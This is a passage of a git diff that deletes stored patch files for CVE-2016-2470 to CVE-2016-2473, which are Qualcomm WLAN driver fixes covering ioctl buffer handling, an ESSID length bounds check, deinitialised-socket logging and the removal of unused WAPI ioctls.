-@@ -5611,7 +5620,7 @@ VOS_STATUS iw_set_pno(struct net_device *dev, struct iw_request_info *info,
- 
-     scan every 5 seconds 2 times, scan every 300 seconds until stopped 
-   -----------------------------------------------------------------------*/
--  ptr = (char*)(wrqu->data.pointer + nOffset);
-+  ptr = extra + nOffset;
- 
-   sscanf(ptr,"%hhu%n", &(pnoRequest.enable), &nOffset);
- 
-@@ -5822,7 +5831,7 @@ VOS_STATUS iw_set_rssi_filter(struct net_device *dev, struct iw_request_info *in
-     v_U8_t rssiThreshold = 0;
-     v_U8_t nRead;
- 
--    nRead = sscanf(wrqu->data.pointer + nOffset,"%hhu",
-+    nRead = sscanf(extra + nOffset,"%hhu",
-            &rssiThreshold);
- 
-     if ( 1 != nRead )
-@@ -5983,7 +5992,7 @@ static int iw_set_band_config(struct net_device *dev,
-                            union iwreq_data *wrqu, char *extra)
- {
-     hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev);
--    tANI_U8 *ptr = (tANI_U8*)wrqu->data.pointer;
-+    tANI_U8 *ptr = extra;
-     int ret = 0;
- 
-     VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,"%s: ", __func__);
-@@ -6030,7 +6039,7 @@ VOS_STATUS iw_set_power_params(struct net_device *dev, struct iw_request_info *i
-   VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_INFO,
-             "Power Params data len %d data %s",
-             wrqu->data.length,
--            wrqu->data.pointer);
-+            extra);
- 
-   if ((WLAN_HDD_GET_CTX(pAdapter))->isLogpInProgress)
-   {
-@@ -6072,7 +6081,7 @@ VOS_STATUS iw_set_power_params(struct net_device *dev, struct iw_request_info *i
-   powerRequest.uEnableBET        = SIR_NOCHANGE_POWER_VALUE;
-   powerRequest.uBETInterval      = SIR_NOCHANGE_POWER_VALUE;
- 
--  ptr = (char*)(wrqu->data.pointer + nOffset);
-+  ptr = extra + nOffset;
- 
-   while ( uTotalSize )
-   {
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2470/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2016-2470/ANY/0002.patch
deleted file mode 100644
index b2007b28..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2470/ANY/0002.patch
+++ /dev/null
@@ -1,88 +0,0 @@
-From 4c9789ba9ed03adaa689d0831524ed6e5ca00fcd Mon Sep 17 00:00:00 2001
-From: Vinay Krishna Eranna <c_veran@qti.qualcomm.com>
-Date: Mon, 21 Apr 2014 20:17:57 +0530
-Subject: wlan: Avoid abort due to access of deinitialised socket
-
-If driver initialization fails after nl initialization,
-driver tries to stop PE by posting the message to MC
-thread which in turn tries to send a message to the
-ptt App, by this time the socket would have been
-de-initialized due to which abort occurs.
-
-Avoid sending any message during load unload in progress.
-Reduce the min number of logging buffers to support low
-memory devices and use vmalloc instead for logging buffer
-allocation.
-
-Change-Id: Ifdcd6ef0d92f0a68d03193070057a67818371674
-CRs-Fixed: 652067
----
- CORE/HDD/inc/wlan_hdd_cfg.h                  | 2 +-
- CORE/SVC/src/logging/wlan_logging_sock_svc.c | 5 +++--
- CORE/VOSS/src/vos_diag.c                     | 7 +++++++
- 3 files changed, 11 insertions(+), 3 deletions(-)
-
-diff --git a/CORE/HDD/inc/wlan_hdd_cfg.h b/CORE/HDD/inc/wlan_hdd_cfg.h
-index 6451154..ea5e05d 100644
---- a/CORE/HDD/inc/wlan_hdd_cfg.h
-+++ b/CORE/HDD/inc/wlan_hdd_cfg.h
-@@ -2067,7 +2067,7 @@ This feature requires the dependent cfg.ini "gRoamPrefer5GHz" set to 1 */
- 
- //Number of buffers to be used for WLAN logging
- #define CFG_WLAN_LOGGING_NUM_BUF_NAME     "wlanLoggingNumBuf"
--#define CFG_WLAN_LOGGING_NUM_BUF_MIN      ( 8  )
-+#define CFG_WLAN_LOGGING_NUM_BUF_MIN      ( 4  )
- #define CFG_WLAN_LOGGING_NUM_BUF_MAX      ( 64 )
- #define CFG_WLAN_LOGGING_NUM_BUF_DEFAULT  ( 32 )
- #endif //WLAN_LOGGING_SOCK_SVC_ENABLE
-diff --git a/CORE/SVC/src/logging/wlan_logging_sock_svc.c b/CORE/SVC/src/logging/wlan_logging_sock_svc.c
-index 9ac2201..4b78a0d 100644
---- a/CORE/SVC/src/logging/wlan_logging_sock_svc.c
-+++ b/CORE/SVC/src/logging/wlan_logging_sock_svc.c
-@@ -30,6 +30,7 @@
-  *
-  ******************************************************************************/
- #ifdef WLAN_LOGGING_SOCK_SVC_ENABLE
-+#include <vmalloc.h>
- #include <wlan_nlink_srv.h>
- #include <vos_status.h>
- #include <vos_trace.h>
-@@ -487,7 +488,7 @@ int wlan_logging_sock_activate_svc(int log_fe_to_console, int num_buf)
- 
- 	gapp_pid = INVALID_PID;
- 
--	gplog_msg = (struct log_msg *) vos_mem_malloc(
-+	gplog_msg = (struct log_msg *) vmalloc(
- 			num_buf * sizeof(struct log_msg));
- 	if (!gplog_msg) {
- 		pr_err("%s: Could not allocate memory\n", __func__);
-@@ -545,7 +546,7 @@ int wlan_logging_sock_deactivate_svc(void)
- 	wake_up_interruptible(&gwlan_logging.wait_queue);
- 	wait_for_completion_interruptible(&gwlan_logging.shutdown_comp);
- 
--	vos_mem_free(gplog_msg);
-+	vfree(gplog_msg);
- 
- 	pr_info("%s: Deactivate wlan_logging svc\n", __func__);
- 
-diff --git a/CORE/VOSS/src/vos_diag.c b/CORE/VOSS/src/vos_diag.c
-index 5b1dfde..06be463 100644
---- a/CORE/VOSS/src/vos_diag.c
-+++ b/CORE/VOSS/src/vos_diag.c
-@@ -131,6 +131,13 @@ void vos_log_submit(v_VOID_t *plog_hdr_ptr)
-      /*Get the Hdd Context */
-     pHddCtx = ((VosContextType*)(pVosContext))->pHDDContext;
- 
-+    if (WLAN_HDD_IS_LOAD_UNLOAD_IN_PROGRESS(pHddCtx))
-+    {
-+        VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_INFO,
-+                  "%s: Unloading/Loading in Progress. Ignore!!!", __func__);
-+        return;
-+    }
-+
- #ifdef WLAN_KD_READY_NOTIFIER
-     /* NL is not ready yet, WLAN KO started first */
-     if ((pHddCtx->kd_nl_init) && (!pHddCtx->ptt_pid))
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2471/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2471/ANY/0001.patch
deleted file mode 100644
index 18eed761..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2471/ANY/0001.patch
+++ /dev/null
@@ -1,43 +0,0 @@
-From 2c8961821b7691a95cbf5ecc6996e8229d6d5303 Mon Sep 17 00:00:00 2001
-From: Arun Khandavalli <akhandav@qti.qualcomm.com>
-Date: Mon, 9 Nov 2015 10:28:18 +0530
-Subject: wlan: validate essid length before processing scan req
-
-Presently we are not validating the length of the essid received
-and directly copying the buffer without size checking.
-Perform bound checking before processing the scan req.
-
-Change-Id: I786e4feb67bf039df3d217138a412da54f51787d
-CRs-fixed: 890228
----
- CORE/HDD/src/wlan_hdd_scan.c | 7 ++++++-
- 1 file changed, 6 insertions(+), 1 deletion(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_scan.c b/CORE/HDD/src/wlan_hdd_scan.c
-index 8d3fa84..709fdec 100644
---- a/CORE/HDD/src/wlan_hdd_scan.c
-+++ b/CORE/HDD/src/wlan_hdd_scan.c
-@@ -740,7 +740,8 @@ int __iw_set_scan(struct net_device *dev, struct iw_request_info *info,
- 
-       if (wrqu->data.flags & IW_SCAN_THIS_ESSID)  {
- 
--          if(scanReq->essid_len) {
-+          if(scanReq->essid_len  &&
-+               (scanReq->essid_len <= SIR_MAC_MAX_SSID_LENGTH)) {
-               scanRequest.SSIDs.numOfSSIDs = 1;
-               scanRequest.SSIDs.SSIDList =( tCsrSSIDInfo *)vos_mem_malloc(sizeof(tCsrSSIDInfo));
-               if(scanRequest.SSIDs.SSIDList) {
-@@ -754,6 +755,10 @@ int __iw_set_scan(struct net_device *dev, struct iw_request_info *info,
-                 VOS_ASSERT(0);
-               }
-           }
-+          else
-+          {
-+            hddLog(LOGE, FL("Invalid essid length : %d"), scanReq->essid_len);
-+          }
-       }
- 
-        /* set min and max channel time */
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2472/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2472/ANY/0001.patch
deleted file mode 100644
index ee065765..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2472/ANY/0001.patch
+++ /dev/null
@@ -1,398 +0,0 @@
-From 464c9c8a984c3a36f63b1625d7ab2a1c9eec9697 Mon Sep 17 00:00:00 2001
-From: Girish Gowli <c_ggowli@qti.qualcomm.com>
-Date: Mon, 9 Jun 2014 19:47:53 +0530
-Subject: wlan: Deprecate all WAPI ioctls
-
-ALL WAPI ioctls WLAN_PRIV_SET_WAPI_MODE, WLAN_PRIV_GET_WAPI_MODE
-WLAN_PRIV_SET_WAPI_ASSOC_INFO, WLAN_PRIV_SET_WAPI_KEY,
-WLAN_PRIV_SET_WAPI_BKID, WLAN_PRIV_GET_WAPI_BKID are not being
-used, hence removing the source code related to all these ioctls
-
-Change-Id: I204cd579b4e29df7e995f30cc0aa8612bc7965ee
-CRs-Fixed: 677410
----
- CORE/HDD/src/wlan_hdd_wext.c | 347 +------------------------------------------
- 1 file changed, 6 insertions(+), 341 deletions(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_wext.c b/CORE/HDD/src/wlan_hdd_wext.c
-index 4af981f..8949474 100644
---- a/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/CORE/HDD/src/wlan_hdd_wext.c
-@@ -244,17 +244,12 @@ static const hdd_freq_chan_map_t freq_chan_map[] = { {2412, 1}, {2417, 2},
- #define WLAN_PRIV_DEL_TSPEC (SIOCIWFIRSTPRIV + 11)
- #define WLAN_PRIV_GET_TSPEC (SIOCIWFIRSTPRIV + 13)
- 
--#ifdef FEATURE_WLAN_WAPI
--/* Private ioctls EVEN NO: SET, ODD NO:GET */
--#define WLAN_PRIV_SET_WAPI_MODE         (SIOCIWFIRSTPRIV + 8)
--#define WLAN_PRIV_GET_WAPI_MODE         (SIOCIWFIRSTPRIV + 16)
--#define WLAN_PRIV_SET_WAPI_ASSOC_INFO   (SIOCIWFIRSTPRIV + 10)
--#define WLAN_PRIV_SET_WAPI_KEY          (SIOCIWFIRSTPRIV + 12)
--#define WLAN_PRIV_SET_WAPI_BKID         (SIOCIWFIRSTPRIV + 14)
--#define WLAN_PRIV_GET_WAPI_BKID         (SIOCIWFIRSTPRIV + 15)
--#define WAPI_PSK_AKM_SUITE  0x02721400
--#define WAPI_CERT_AKM_SUITE 0x01721400
--#endif
-+/* (SIOCIWFIRSTPRIV + 8)  is currently unused */
-+/* (SIOCIWFIRSTPRIV + 16) is currently unused */
-+/* (SIOCIWFIRSTPRIV + 10) is currently unused */
-+/* (SIOCIWFIRSTPRIV + 12) is currently unused */
-+/* (SIOCIWFIRSTPRIV + 14) is currently unused */
-+/* (SIOCIWFIRSTPRIV + 15) is currently unused */
- 
- #ifdef FEATURE_OEM_DATA_SUPPORT
- /* Private ioctls for setting the measurement configuration */
-@@ -5797,290 +5792,6 @@ static int iw_get_tspec(struct net_device *dev, struct iw_request_info *info,
-    return 0;
- }
- 
--
--#ifdef FEATURE_WLAN_WAPI
--static int iw_qcom_set_wapi_mode(struct net_device *dev, struct iw_request_info *info,
--        union iwreq_data *wrqu, char *extra)
--{
--    hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev);
--    hdd_wext_state_t *pWextState = WLAN_HDD_GET_WEXT_STATE_PTR(pAdapter);
--    hdd_station_ctx_t *pHddStaCtx = WLAN_HDD_GET_STATION_CTX_PTR(pAdapter);
--    tCsrRoamProfile *pRoamProfile = &pWextState->roamProfile;
--
--    WAPI_FUNCTION_MODE *pWapiMode = (WAPI_FUNCTION_MODE *)extra;
--
--    hddLog(LOG1, "The function iw_qcom_set_wapi_mode called");
--    hddLog(LOG1, "%s: Received data %s", __func__, extra);
--    hddLog(LOG1, "%s: Received length %d", __func__, wrqu->data.length);
--    hddLog(LOG1, "%s: Input Data (wreq) WAPI Mode:%02d", __func__, pWapiMode->wapiMode);
--
--    if ((WLAN_HDD_GET_CTX(pAdapter))->isLogpInProgress)
--    {
--       VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_FATAL,
--                                  "%s:LOGP in Progress. Ignore!!!", __func__);
--       return -EBUSY;
--    }
--
--    if(WZC_ORIGINAL == pWapiMode->wapiMode) {
--        hddLog(LOG1, "%s: WAPI Mode Set to OFF", __func__);
--         /* Set Encryption mode to defualt , this allows next successfull non-WAPI Association */
--        pRoamProfile->EncryptionType.numEntries = 1;
--        pRoamProfile->EncryptionType.encryptionType[0] = eCSR_ENCRYPT_TYPE_NONE;
--        pRoamProfile->mcEncryptionType.numEntries = 1;
--        pRoamProfile->mcEncryptionType.encryptionType[0] = eCSR_ENCRYPT_TYPE_NONE;
--
--        pRoamProfile->AuthType.numEntries = 1;
--        pHddStaCtx->conn_info.authType = eCSR_AUTH_TYPE_OPEN_SYSTEM;
--        pRoamProfile->AuthType.authType[0] = pHddStaCtx->conn_info.authType;
--    }
--    else if(WAPI_EXTENTION == pWapiMode->wapiMode) {
--        hddLog(LOG1, "%s: WAPI Mode Set to ON", __func__);
--    }
--    else
--         return -EINVAL;
--
--    pAdapter->wapi_info.nWapiMode = pWapiMode->wapiMode;
--
--    return 0;
--}
--
--static int iw_qcom_get_wapi_mode(struct net_device *dev, struct iw_request_info *info,
--        union iwreq_data *wrqu, char *extra)
--{
--    hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev);
--    WAPI_FUNCTION_MODE *pWapiMode = (WAPI_FUNCTION_MODE *)(extra);
--
--    if ((WLAN_HDD_GET_CTX(pAdapter))->isLogpInProgress)
--    {
--       VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_FATAL,
--                                  "%s:LOGP in Progress. Ignore!!!", __func__);
--       return -EBUSY;
--    }
--    hddLog(LOG1, "The function iw_qcom_get_wapi_mode called");
--
--    pWapiMode->wapiMode = pAdapter->wapi_info.nWapiMode;
--    hddLog(LOG1, "%s: GET WAPI Mode Value:%02d", __func__, pWapiMode->wapiMode);
--    return 0;
--}
--
--static int iw_qcom_set_wapi_assoc_info(struct net_device *dev, struct iw_request_info *info,
--        union iwreq_data *wrqu, char *extra)
--{
--    hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev);
--//    WAPI_AssocInfo *pWapiAssocInfo = (WAPI_AssocInfo *)(wrqu->data.pointer);
--    WAPI_AssocInfo *pWapiAssocInfo = (WAPI_AssocInfo *)(extra);
--    int i = 0, j = 0;
--    hddLog(LOG1, "The function iw_qcom_set_wapi_assoc_info called");
--    hddLog(LOG1, "%s: Received length %d", __func__, wrqu->data.length);
--    hddLog(LOG1, "%s: Received data %s", __func__, (char*)extra);
--
--    if ((WLAN_HDD_GET_CTX(pAdapter))->isLogpInProgress)
--    {
--       VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_FATAL,
--                                  "%s:LOGP in Progress. Ignore!!!", __func__);
--       return -EBUSY;
--    }
--
--    if (NULL == pWapiAssocInfo)
--    {
--       VOS_TRACE(VOS_MODULE_ID_SYS, VOS_TRACE_LEVEL_ERROR,
--             "%s: WDA NULL context", __func__);
--       VOS_ASSERT(0);
--       return VOS_STATUS_E_FAILURE;
--    }
--
--    hddLog(LOG1, "%s: INPUT DATA:\nElement ID:0x%02x Length:0x%02x Version:0x%04x",__func__,pWapiAssocInfo->elementID,pWapiAssocInfo->length,pWapiAssocInfo->version);
--    hddLog(LOG1,"%s: akm Suite Cnt:0x%04x",__func__,pWapiAssocInfo->akmSuiteCount);
--    for(i =0 ; i < 16 ; i++)
--        hddLog(LOG1,"akm suite[%02d]:0x%08x",i,pWapiAssocInfo->akmSuite[i]);
--
--    hddLog(LOG1,"%s: Unicast Suite Cnt:0x%04x",__func__,pWapiAssocInfo->unicastSuiteCount);
--    for(i =0 ; i < 16 ; i++)
--        hddLog(LOG1, "Unicast suite[%02d]:0x%08x",i,pWapiAssocInfo->unicastSuite[i]);
--
--    hddLog(LOG1,"%s: Multicast suite:0x%08x Wapi capa:0x%04x",__func__,pWapiAssocInfo->multicastSuite,pWapiAssocInfo->wapiCability);
--    hddLog(LOG1, "%s: BKID Cnt:0x%04x",__func__,pWapiAssocInfo->bkidCount);
--    for(i = 0 ; i < 16 ; i++) {
--        hddLog(LOG1, "BKID List[%02d].bkid:0x",i);
--        for(j = 0 ; j < 16 ; j++)
--            hddLog(LOG1,"%02x",pWapiAssocInfo->bkidList[i].bkid[j]);
--    }
--
--    /* We are not using the entire IE as provided by the supplicant.
--     * This is being calculated by SME. This is the same as in the
--     * case of WPA. Only the auth mode information needs to be
--     * extracted here*/
--    if ( pWapiAssocInfo->akmSuite[0] == WAPI_PSK_AKM_SUITE ) {
--       hddLog(LOG1, "%s: WAPI AUTH MODE SET TO PSK",__func__);
--       pAdapter->wapi_info.wapiAuthMode = WAPI_AUTH_MODE_PSK;
--    }
--
--    if ( pWapiAssocInfo->akmSuite[0] == WAPI_CERT_AKM_SUITE) {
--       hddLog(LOG1, "%s: WAPI AUTH MODE SET TO CERTIFICATE",__func__);
--       pAdapter->wapi_info.wapiAuthMode = WAPI_AUTH_MODE_CERT;
--    }
--    return 0;
--}
--
--static int iw_qcom_set_wapi_key(struct net_device *dev, struct iw_request_info *info,
--        union iwreq_data *wrqu, char *extra)
--{
--    hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev);
--    hdd_station_ctx_t *pHddStaCtx = WLAN_HDD_GET_STATION_CTX_PTR(pAdapter);
--    eHalStatus       halStatus   = eHAL_STATUS_SUCCESS;
--    tANI_U32         roamId      = 0xFF;
--    tANI_U8         *pKeyPtr     = NULL;
--    v_BOOL_t         isConnected = TRUE;
--    tCsrRoamSetKey   setKey;
--    int i = 0;
--    WLAN_WAPI_KEY *pWapiKey = (WLAN_WAPI_KEY *)(extra);
--
--    if ((WLAN_HDD_GET_CTX(pAdapter))->isLogpInProgress)
--    {
--       VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_FATAL,
--                                  "%s:LOGP in Progress. Ignore!!!", __func__);
--       return -EBUSY;
--    }
--
--    hddLog(LOG1, "The function iw_qcom_set_wapi_key called ");
--    hddLog(LOG1, "%s: Received length %d", __func__, wrqu->data.length);
--    hddLog(LOG1, "%s: Received data %s", __func__, (char*)extra);
--
--    hddLog(LOG1,":%s: INPUT DATA:\nKey Type:0x%02x Key Direction:0x%02x KEY ID:0x%02x", __func__, pWapiKey->keyType, pWapiKey->keyDirection, pWapiKey->keyId);
--    hddLog(LOG1,"Add Index:0x");
--    for(i =0 ; i < 12 ; i++)
--        hddLog(LOG1,"%02x",pWapiKey->addrIndex[i]);
--
--    hddLog(LOG1,"%s: WAPI ENCRYPTION KEY LENGTH:0x%04x", __func__,pWapiKey->wpiekLen);
--    hddLog(LOG1, "WAPI ENCRYPTION KEY:0x");
--    for(i =0 ; i < 16 ; i++)
--        hddLog(LOG1,"%02x",pWapiKey->wpiek[i]);
--
--    hddLog(LOG1,"%s: WAPI INTEGRITY CHECK KEY LENGTH:0x%04x", __func__,pWapiKey->wpickLen);
--    hddLog(LOG1,"WAPI INTEGRITY CHECK KEY:0x");
--    for(i =0 ; i < 16 ; i++)
--        hddLog(LOG1,"%02x",pWapiKey->wpick[i]);
--
--    hddLog(LOG1,"WAPI PN NUMBER:0x");
--    for(i = 0 ; i < 16 ; i++)
--        hddLog(LOG1,"%02x",pWapiKey->pn[i]);
--
--    // Clear the setkey memory
--    vos_mem_zero(&setKey,sizeof(tCsrRoamSetKey));
--    // Store Key ID
--    setKey.keyId = (unsigned char)( pWapiKey->keyId );
--    // SET WAPI Encryption
--    setKey.encType  = eCSR_ENCRYPT_TYPE_WPI;
--    // Key Directionn both TX and RX
--    setKey.keyDirection = eSIR_TX_RX; // Do WE NEED to update this based on Key Type as GRP/UNICAST??
--    // the PAE role
--    setKey.paeRole = 0 ;
--
--    switch ( pWapiKey->keyType )
--    {
--        case PAIRWISE_KEY:
--        {
--            isConnected = hdd_connIsConnected(pHddStaCtx);
--            vos_mem_copy(setKey.peerMac,&pHddStaCtx->conn_info.bssId,WNI_CFG_BSSID_LEN);
--            break;
--        }
--        case GROUP_KEY:
--        {
--            vos_set_macaddr_broadcast( (v_MACADDR_t *)setKey.peerMac );
--            break;
--        }
--        default:
--        {
--            //Any other option is invalid.
--            VOS_TRACE( VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
--                       "[%4d] %s() failed to Set Key. Invalid key type %d", __LINE__,__func__ , -1 );
--
--            hddLog(LOGE," %s: Error WAPI Key Add Type",__func__);
--            halStatus = !eHAL_STATUS_SUCCESS; // NEED TO UPDATE THIS WITH CORRECT VALUE
--            break; // NEED RETURN FROM HERE ????
--        }
--    }
--
--    // Concatenating the Encryption Key (EK) and the MIC key (CK): EK followed by CK
--    setKey.keyLength = (v_U16_t)((pWapiKey->wpiekLen)+(pWapiKey->wpickLen));
--    pKeyPtr = setKey.Key;
--    memcpy( pKeyPtr, pWapiKey->wpiek, pWapiKey->wpiekLen );
--    pKeyPtr += pWapiKey->wpiekLen;
--    memcpy( pKeyPtr, pWapiKey->wpick, pWapiKey->wpickLen );
--
--    // Set the new key with SME.
--    pHddStaCtx->roam_info.roamingState = HDD_ROAM_STATE_SETTING_KEY;
--
--    if ( isConnected ) {
--        halStatus = sme_RoamSetKey( WLAN_HDD_GET_HAL_CTX(pAdapter), pAdapter->sessionId, &setKey, &roamId );
--        if ( halStatus != eHAL_STATUS_SUCCESS )
--        {
--            VOS_TRACE( VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
--                       "[%4d] sme_RoamSetKey returned ERROR status= %d", __LINE__, halStatus );
--
--            pHddStaCtx->roam_info.roamingState = HDD_ROAM_STATE_NONE;
--        }
--    }
--#if 0 /// NEED TO CHECK ON THIS
--    else
--    {
--        // Store the keys in the adapter to be moved to the profile & passed to
--        // SME in the ConnectRequest if we are not yet in connected state.
--         memcpy( &pAdapter->setKey[ setKey.keyId ], &setKey, sizeof( setKey ) );
--         pAdapter->fKeySet[ setKey.keyId ] = TRUE;
--
--         VOS_TRACE( VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_INFO_MED,
--                    "  Saving key [idx= %d] to apply when moving to connected state ",
--                    setKey.keyId );
--
--    }
--#endif
--    return halStatus;
--}
--
--static int iw_qcom_set_wapi_bkid(struct net_device *dev, struct iw_request_info *info,
--        union iwreq_data *wrqu, char *extra)
--{
--    hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev);
--#ifdef WLAN_DEBUG
--    int i = 0;
--    WLAN_BKID_LIST  *pBkid       = ( WLAN_BKID_LIST *) extra;
--#endif
--
--    hddLog(LOG1, "The function iw_qcom_set_wapi_bkid called");
--    hddLog(LOG1, "%s: Received length %d", __func__, wrqu->data.length);
--    hddLog(LOG1, "%s: Received data %s", __func__, (char*)extra);
--
--    hddLog(LOG1,"%s: INPUT DATA:\n BKID Length:0x%08x", __func__,pBkid->length);
--    hddLog(LOG1,"%s: BKID Cnt:0x%04x", __func__, pBkid->BKIDCount);
--
--    hddLog(LOG1,"BKID KEY LIST[0]:0x");
--
--    if ((WLAN_HDD_GET_CTX(pAdapter))->isLogpInProgress)
--    {
--       VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_FATAL,
--                                  "%s:LOGP in Progress. Ignore!!!", __func__);
--       return -EBUSY;
--    }
--
--#ifdef WLAN_DEBUG
--    for(i =0 ; i < 16 ; i++)
--        hddLog(LOG1,"%02x",pBkid->BKID[0].bkid[i]);
--#endif
--
--    return 0;
--}
--
--static int iw_qcom_get_wapi_bkid(struct net_device *dev, struct iw_request_info *info,
--        union iwreq_data *wrqu, char *extra)
--{
--    /* Yet to implement this function, 19th April 2010 */
--    hddLog(LOG1, "The function iw_qcom_get_wapi_bkid called ");
--
--    return 0;
--}
--#endif /* FEATURE_WLAN_WAPI */
--
- #ifdef WLAN_FEATURE_VOWIFI_11R
- //
- //
-@@ -7801,14 +7512,6 @@ static const iw_handler we_private[] = {
-    [WLAN_PRIV_GET_OEM_DATA_RSP - SIOCIWFIRSTPRIV] = iw_get_oem_data_rsp, //oem data req Specifc
- #endif
- 
--#ifdef FEATURE_WLAN_WAPI
--   [WLAN_PRIV_SET_WAPI_MODE             - SIOCIWFIRSTPRIV]  = iw_qcom_set_wapi_mode,
--   [WLAN_PRIV_GET_WAPI_MODE             - SIOCIWFIRSTPRIV]  = iw_qcom_get_wapi_mode,
--   [WLAN_PRIV_SET_WAPI_ASSOC_INFO       - SIOCIWFIRSTPRIV]  = iw_qcom_set_wapi_assoc_info,
--   [WLAN_PRIV_SET_WAPI_KEY              - SIOCIWFIRSTPRIV]  = iw_qcom_set_wapi_key,
--   [WLAN_PRIV_SET_WAPI_BKID             - SIOCIWFIRSTPRIV]  = iw_qcom_set_wapi_bkid,
--   [WLAN_PRIV_GET_WAPI_BKID             - SIOCIWFIRSTPRIV]  = iw_qcom_get_wapi_bkid,
--#endif /* FEATURE_WLAN_WAPI */
- #ifdef WLAN_FEATURE_VOWIFI_11R
-    [WLAN_PRIV_SET_FTIES                 - SIOCIWFIRSTPRIV]   = iw_set_fties,
- #endif
-@@ -8214,44 +7917,6 @@ static const struct iw_priv_args we_private_args[] = {
-         "get_oem_data_rsp" },
- #endif
- 
--#ifdef FEATURE_WLAN_WAPI
--   /* handlers for main ioctl SET_WAPI_MODE */
--    {   WLAN_PRIV_SET_WAPI_MODE,
--        IW_PRIV_TYPE_INT | IW_PRIV_SIZE_FIXED | 1,
--        0,
--        "SET_WAPI_MODE" },
--
--   /* handlers for main ioctl GET_WAPI_MODE */
--    {   WLAN_PRIV_GET_WAPI_MODE,
--        0,
--        IW_PRIV_TYPE_INT | IW_PRIV_SIZE_FIXED | 1,
--        "GET_WAPI_MODE" },
--
--   /* handlers for main ioctl SET_ASSOC_INFO */
--    {   WLAN_PRIV_SET_WAPI_ASSOC_INFO,
--        IW_PRIV_TYPE_BYTE | IW_PRIV_SIZE_FIXED | 400,
--        0,
--        "SET_WAPI_ASSOC" },
--
--   /* handlers for main ioctl SET_WAPI_KEY */
--    {   WLAN_PRIV_SET_WAPI_KEY,
--        IW_PRIV_TYPE_BYTE | IW_PRIV_SIZE_FIXED | 71,
--        0,
--        "SET_WAPI_KEY" },
--
--   /* handlers for main ioctl SET_WAPI_BKID */
--    {   WLAN_PRIV_SET_WAPI_BKID,
--        IW_PRIV_TYPE_BYTE | IW_PRIV_SIZE_FIXED | 24,
--        0,
--        "SET_WAPI_BKID" },
--
--   /* handlers for main ioctl GET_WAPI_BKID */
--    {   WLAN_PRIV_GET_WAPI_BKID,
--        0,
--        IW_PRIV_TYPE_BYTE | IW_PRIV_SIZE_FIXED | 24,
--        "GET_WAPI_BKID" },
--#endif /* FEATURE_WLAN_WAPI */
--
-     /* handlers for main ioctl - host offload */
-     {
-         WLAN_PRIV_SET_HOST_OFFLOAD,
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2473/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2473/ANY/0001.patch
deleted file mode 100644
index e7492a22..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2473/ANY/0001.patch
+++ /dev/null
@@ -1,284 +0,0 @@
-From 0273cba64b0436d481e09222a631a6acc274b96c Mon Sep 17 00:00:00 2001
-From: Arif Hussain <c_arifh@qca.qualcomm.com>
-Date: Tue, 7 Jan 2014 20:58:29 -0800
-Subject: wlan: Fix ioctl copy issue
-
-Few IOCTL's SET command's uses ODD number,
-so we cannot utilize kernel facility "extra".
-We need to copy the user data in kernel buffer
-using copy_from_user function.
-
-Change-Id: I550bf90fbbacb9d5ac4187ed423fca90fafccad1
-CRs-Fixed: 596898
----
- CORE/HDD/src/wlan_hdd_wext.c | 146 +++++++++++++++++++++++++++++++++++++------
- 1 file changed, 127 insertions(+), 19 deletions(-)
-
-(limited to 'CORE/HDD/src/wlan_hdd_wext.c')
-
-diff --git a/CORE/HDD/src/wlan_hdd_wext.c b/CORE/HDD/src/wlan_hdd_wext.c
-index 55b2100..90df277 100644
---- a/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/CORE/HDD/src/wlan_hdd_wext.c
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2012-2013, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2012-2014, The Linux Foundation. All rights reserved.
-  *
-  * Previously licensed under the ISC license by Qualcomm Atheros, Inc.
-  *
-@@ -373,6 +373,56 @@ int wlan_hdd_set_filter(hdd_context_t *pHddCtx, tpPacketFilterCfg pRequest,
- 
- /**---------------------------------------------------------------------------
- 
-+  \brief mem_alloc_copy_from_user_helper -
-+
-+   Helper function to allocate buffer and copy user data.
-+
-+  \param  - wrqu - Pointer to IOCTL Data.
-+            len  - size
-+
-+  \return - On Success pointer to buffer, On failure NULL
-+
-+  --------------------------------------------------------------------------*/
-+static void *mem_alloc_copy_from_user_helper(const void *wrqu_data, size_t len)
-+{
-+    u8 *ptr = NULL;
-+
-+  /* in order to protect the code, an extra byte is post appended to the buffer
-+   * and the null termination is added.  However, when allocating (len+1) byte
-+   * of memory, we need to make sure that there is no uint overflow when doing
-+   * addition. In theory check len < UINT_MAX protects the uint overflow. For
